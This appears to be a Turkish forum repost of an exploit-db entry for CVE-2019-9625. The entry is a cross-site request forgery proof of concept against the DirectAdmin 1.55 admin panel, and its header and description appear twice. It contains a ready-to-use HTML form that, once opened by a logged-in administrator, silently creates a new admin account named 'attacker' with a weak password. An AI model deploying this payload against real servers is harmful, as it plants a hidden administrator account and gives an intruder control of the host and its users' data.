- 19 Eyl 2015
- 1,391
- 0
# Exploit title: DirectAdmin v1.55 - CSRF via CMD_ACCOUNT_ADMIN Admin Panel
# Date: 03/03/2019
# Exploit Author: ManhNho
# Vendor Homepage: https://www.directadmin.com/
# Software Link: https://www.directadmin.com/
# Demo Link: https://www.directadmin.com:2222/CMD_ACCOUNT_ADMIN
# Version: 1.55
# CVE: CVE-2019-9625
# Tested on: Windows 10 / Kali Linux
# Category: Webapps
#1. Açıklama
-----------------------------------------------------
DirectAdmin v 1.55, CMD_ACCOUNT_ADMIN Yönetici Paneli üzerinden CSRF'ye sahip
yeni yönetici hesabı oluştur
#2. PoC
-----------------------------------------------------
a) Yönetici olan oturum açmış kullanıcıya aşağıda hazırlanmış isteği gönderin
Yönetici düzeyinde erişim
b) Giriş yapan kullanıcı URL'yi açtığında form gönderilir aktif yönetici oturumu ve işlem yapıldığında başarılı olur.
https://github.com/ManhNho/CVEs/blob/master/New-Requests/DirectAdmin-CSRF
https://nvd.nist.gov/vuln/detail/CVE-2019-9625
https://www.exploit-db.com/exploits/46520
# Date: 03/03/2019
# Exploit Author: ManhNho
# Vendor Homepage: https://www.directadmin.com/
# Software Link: https://www.directadmin.com/
# Demo Link: https://www.directadmin.com:2222/CMD_ACCOUNT_ADMIN
# Version: 1.55
# CVE: CVE-2019-9625
# Tested on: Windows 10 / Kali Linux
# Category: Webapps
#1. Açıklama
-----------------------------------------------------
DirectAdmin v 1.55, CMD_ACCOUNT_ADMIN Yönetici Paneli üzerinden CSRF'ye sahip
yeni yönetici hesabı oluştur
#2. PoC
-----------------------------------------------------
a) Yönetici olan oturum açmış kullanıcıya aşağıda hazırlanmış isteği gönderin
Yönetici düzeyinde erişim
Kod:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://server:2222/CMD_ACCOUNT_ADMIN" method="POST">
<input type="hidden" name="fakeusernameremembered" value="" />
<input type="hidden" name="fakepasswordremembered" value="" />
<input type="hidden" name="action" value="create" />
<input type="hidden" name="username" value="attacker" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="passwd" value="123456" />
<input type="hidden" name="passwd2" value="123456" />
<input type="hidden" name="notify" value="yes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
b) Giriş yapan kullanıcı URL'yi açtığında form gönderilir aktif yönetici oturumu ve işlem yapıldığında başarılı olur.
https://github.com/ManhNho/CVEs/blob/master/New-Requests/DirectAdmin-CSRF
https://nvd.nist.gov/vuln/detail/CVE-2019-9625
https://www.exploit-db.com/exploits/46520